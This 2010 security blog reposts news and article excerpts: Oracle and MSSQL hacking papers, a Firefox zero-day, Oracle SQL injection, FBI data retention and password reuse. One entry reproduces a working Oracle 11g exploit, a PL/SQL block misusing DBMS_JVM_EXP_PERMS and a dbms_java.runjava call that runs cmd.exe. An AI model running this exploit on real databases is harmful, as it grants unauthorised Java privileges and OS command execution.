Monday, February 22, 2010

The Operation CouldBurst Attack

This paper is about methods to hacking into Microsoft SQL, Oracle Database and latest Attack in Chapter "Operation CloudBurst". Moreover,we also show the ways to use the Best Exploitation tool, Metasploit Framework (Thank HD Moore and Rapid7) that powerful than day in the past with many exploit and auxiliary (We will see it ;D)

We divide the paper into 6 sections from 0x00 to 0x05. However, only section 0x01 to 0x03 are technical issue. Section 0x01, we show the steps to hack into MSSQL Database. Section 0x02, we switch to talk about Oracle Database. The Last technical section lets you update latest exploitation way Step-By-Step using Metasploit Framework get access to system and compromise all domain networks :-D

We recommend to read previous paper "The Art of Grey-Box Attack" that guide you about methods to hacking into Windows system, Linux system and Client-Side Attack.

To read full article, please see:
http://www.exploit-db.com/papers/11493
This paper is taken from © Offensive Security

Saturday, February 20, 2010

Zero day exploit for Firefox 3.6

Russian security firm Intevydis has made a Windows exploit for a previously unknown security hole in Firefox 3.6 available to its customers. The exploit allows attackers to remotely gain control of a PC. Intevydis develops the commercial VulnDisco add-on for the also commercial Canvas exploit toolkit by vendor Immunity. On the Immunity forum, developer Evgeny Legerov praises his exploit for Windows XP (SP3) and Vista as being quite reliable. The developer says It was an interesting challenge to find the flaw – a buffer overflow – and to exploit it.

While the post dates back to the beginning of February, the hole is likely to remain open since no updates have been released for Firefox 3.6 so far. Secunia rates the problem as critical, but hasn't provided any further information in its advisories and the Mozilla Foundation has become aware of the problem, but has yet to release an official statement. Whether the exploit has already been widely circulated or used on a large scale remains unknown. However, according to the analysis on the Extraexploit blog, a significant increase in the number of Firefox 3.6 crashes was noted on the 12th and 13th of February. It is unclear whether the crashes were connected to the exploit being tested. The pages causing the highest number of crashes are listed in Mozilla's crash reports.

In passing, Legerov also mentions zero day exploits for Lotus Notes 8.5/8.5fp1 and for RealPlayer 11. The exploit for RealPlayer is the modernised version of an exploit that appeared two years ago for a hole that RealPlayer closed only recently.

This article is taken from:
http://www.h-online.com/security/news/item/Zero-day-exploit-for-Firefox-3-6-936124.html

Self-Inflicted SQL Injection – don’t quote me !

After my recent post about escaping quotes in SQL scripts, I was surprised and delighted to receive a mail from Alexander Kornbrust, CEO of Red Database Security.
In it, he said he’d read the post and pointed out that the code therin was vulnerable to SQL-Injection.
I was fortunate enough to work with Alex, before he went off to become famous, so I know that he’s a bona fide expert in all things Oracle, especially security. Even so, I was initially puzzled by his assertion.
After all, the code I’d posted was an example where the code is held in a script and NOT in the database so wouldn’t be vulnerable to being executed by someone who’d hacked into the database itself. After all, SQL Injection happens interactively doesn’t it ? The hacker needs to be probing for weaknesses via a web front-end or similar. Don’t they have to be physically typing stuff in somewhere for this to work ? Er….apparently not.
Having asked around a number of Oracle developers, this would seem to be a widely held misconception. In terms of SQL Injection attacks, we’re all familiar with the classic HTML login form which POSTS to some mid-tier script or program which in turn, simply concatenates the username and password strings supplied by the user into a query then fires it off unthinkingly at the database. But how can you be attacked when the attacker isn’t even around at the time ?

Before I go any further, I think it’s only prudent to state the usual caveats here :

1) As with anything I post on this blog, this is code I’ve tested and works for me on my environment. I don’t make any garuantees that it’ll work the same anywhere else and I trust that anyone as discerning and intelligent, as you obviously are dear reader (as your reading this blog), would do anything as silly as applying this code to a critical environment without testing it out themselves first – somewhere safe .

2) What follows is an example of how an Oracle database can be vulnerable to such an attack and how to take steps to guard against it. It is not intended for use for nefarious purposes.

I should also say at this point that these examples were tested by me on Oracle XE Release 10.2.0.1.0 so there’s no garuantee that it would work the same on any other Oracle RDBMS version.

To continue reading, please read
here
This article taken from The Anti-Kyte

Sunday, February 14, 2010

Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle

I had gathered an interesting collection of quick methods of blind SQL Injection exploitation, but I was lacking in a similar method for another widespread DBMS – Oracle. It induced me to conduct a small research intended for discovering analogous methods applicable to the specified database.

I found out that all known methods of error-based Blind SQL Injection exploitation don’t work in the Oracle environment. Then, my attention was attracted by the functions of interaction with the XML format. After a short investigation, I found a function XMLType() that returns the first symbol of requested data in the error message (LPX-00XXX):

For more information, please read this blog:
http://ptresearch.blogspot.com/2010/01/methods-of-quick-exploitation-of-blind_25.html

Thursday, February 11, 2010

Hacking Oracle 11g

David Litchfield’s slides from Blackhat DC 2010 are now online. Here is the 0day from his slides, which work even on 11g R2:

Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,'java.io.FilePermission’,’< FILES>>‘,’execute’,'ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/


Once the Java permissions are available, an end user can simple create a procedure and execute OS command from this procedure (http://milw0rm.com/exploits/2837).

However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:

select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\syste\\cmd.exe
/c dir>c:\\out.lst’)from dual;


To download video about this presentattion, here.

Some of them said Blackhat has removed this video, but i can download it last week.
http://blog.red-database-security.com/2010/02/05/oracle-blackhat-video-removed-from-website/


Article from :http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/

Here are links that related to Hacking Oracle 11g:
http://www.favsky.com/computer/news/itworld/black-hat-zero-day-hack-of-oracle-11g-database-revealed.html

Saturday, February 06, 2010

FBI wants records kept of Web sites visited

WASHINGTON--The FBI is pressing Internet service providers to record which Web sites customers visit and retain those logs for two years, a requirement that law enforcement believes could help it in investigations of child pornography and other serious crimes.

FBI Director Robert Mueller supports storing Internet users' "origin and destination information," a bureau attorney said at a federal task force meeting on Thursday.

As far back as a 2006 speech, Mueller had called for data retention on the part of Internet providers, and emphasized the point two years later when explicitly asking Congress to enact a law making it mandatory. But it had not been clear before that the FBI was asking companies to begin to keep logs of what Web sites are visited, which few if any currently do.

The FBI is not alone in renewing its push for data retention. As CNET reported earlier this week, a survey of state computer crime investigators found them to be nearly unanimous in supporting the idea. Matt Dunn, an Immigration and Customs Enforcement agent in the Department of Homeland Security, also expressed support for the idea during the task force meeting.

Greg Motta, the chief of the FBI's digital evidence section, said that the bureau was trying to preserve its existing ability to conduct criminal investigations. Federal regulations in place since at least 1986 require phone companies that offer toll service to "retain for a period of 18 months" records including "the name, address, and telephone number of the caller, telephone number called, date, time and length of the call."

At Thursday's meeting (PDF) of the Online Safety and Technology Working Group, which was created by Congress and organized by the U.S. Department of Commerce, Motta stressed that the bureau was not asking that content data, such as the text of e-mail messages, be retained.

"The question at least for the bureau has been about non-content transactional data to be preserved: transmission records, non-content records...addressing, routing, signaling of the communication," Motta said. Director Mueller recognizes, he added "there's going to be a balance of what industry can bear...He recommends origin and destination information for non-content data."

Motta pointed to a 2006 resolution from the International Association of Chiefs of Police, which called for the "retention of customer subscriber information, and source and destination information for a minimum specified reasonable period of time so that it will be available to the law enforcement community."

Recording what Web sites are visited, though, is likely to draw both practical and privacy objections.

"We're not set up to keep URL information anywhere in the network," said Drew Arena, Verizon's vice president and associate general counsel for law enforcement compliance.

And, Arena added, "if you were do to deep packet inspection to see all the URLs, you would arguably violate the Wiretap Act."

Another industry representative with knowledge of how Internet service providers work was unaware of any company keeping logs of what Web sites its customers visit.

If logs of Web sites visited began to be kept, they would be available only to local, state, and federal police with legal authorization such as a subpoena or search warrant.

What remains unclear are the details of what the FBI is proposing. The possibilities include requiring an Internet provider to log the Internet protocol (IP) address of a Web site visited, or the domain name such as cnet.com, a host name such as news.cnet.com, or the actual URL such as http://reviews.cnet.com/Music/2001-6450_7-0.html.

While the first three categories could be logged without doing deep packet inspection, the fourth category would require it. That could run up against opposition in Congress, which lambasted the concept in a series of hearings in 2008, causing the demise of a company, NebuAd, which pioneered it inside the United States.

The technical challenges also may be formidable. John Seiver, an attorney at Davis Wright Tremaine who represents cable providers, said one of his clients had experience with a law enforcement request that required the logging of outbound URLs.

"Eighteen million hits an hour would have to have been logged," a staggering amount of data to sort through, Seiver said. The purpose of the FBI's request was to identify visitors to two URLs, "to try to find out...who's going to them."

A Justice Department representative said the department does not have an official position on data retention.

Disclosure: The author of this story participated in the meeting of the Online Safety and Technology Working Group, though after the law enforcement representatives spoke.

Most consumers reuse banking passwords

The majority of online banking customers reuse their online-banking login credentials on other websites, according to a new survey on password insecurity.

Online security firm Trusteer reports that 73 per cent of bank customers use their online account password to access at least one other, less sensitive website. Even worse, around half (47 per cent) use the same online banking username and password for other website logins.

This dismal password security practice means that if cybercrooks trick a user into giving away his login credentials for a social networking site, for example, they stand a very good chance of getting into webmail and online banking accounts for the same person, potentially bringing about crippling financial losses as a result.

Trusteer's findings are pulled from a sample of users of its Rapport browser security service. This is offered through online banks in Europe and North America to their customers as a defence against phishing attacks. Web users outfitted with Trusteer's Rapport browser security plug-in are prevented from sending login details to fraudsters, even if they visit and attempt to enter data into a known phishing site.

The survey (PDF) also found that when a bank permits users to pick their own user ID, 65 per cent will re-use this username with a non-financial website, a figure that drops to 45 per cent even if a bank chooses the user ID for its customers.

Trusteer expressed surprise that consumers were so lax on password security, even when it comes to online banking websites. Here at El Reg, we'd be surprised if anyone produced a survey or research indicating that password security among consumers and enterprise users was anything better than dreadful.

"Using stolen credentials remains the easiest way for criminals to bypass the security measures implemented by banks to protect their online applications, so we wanted to see how often users re-purpose their financial service usernames and passwords," explained Amit Klein, CTO of Trusteer. "Our findings were very surprising, and reveal that consumers are not aware, or are choosing to ignore, the security implications of reusing their banking credentials on multiple websites."

Trusteer advised consumers to keep at least three sets of credentials: one that's only used with financial websites, the second for websites that hold information about a user's identity, and the third set for other less sensitive websites. That's certainly a start, but web users also need to think about using hard-to-guess passwords able to withstand brute force dictionary password cracking attacks commonly used by even minimally-skilled cybercroooks.

Top tips from Microsoft (here) and Sophos (here) outline tactics for coming up with hard-to-break but straightforward enough to remember website login credentials.

From SecurityFocus.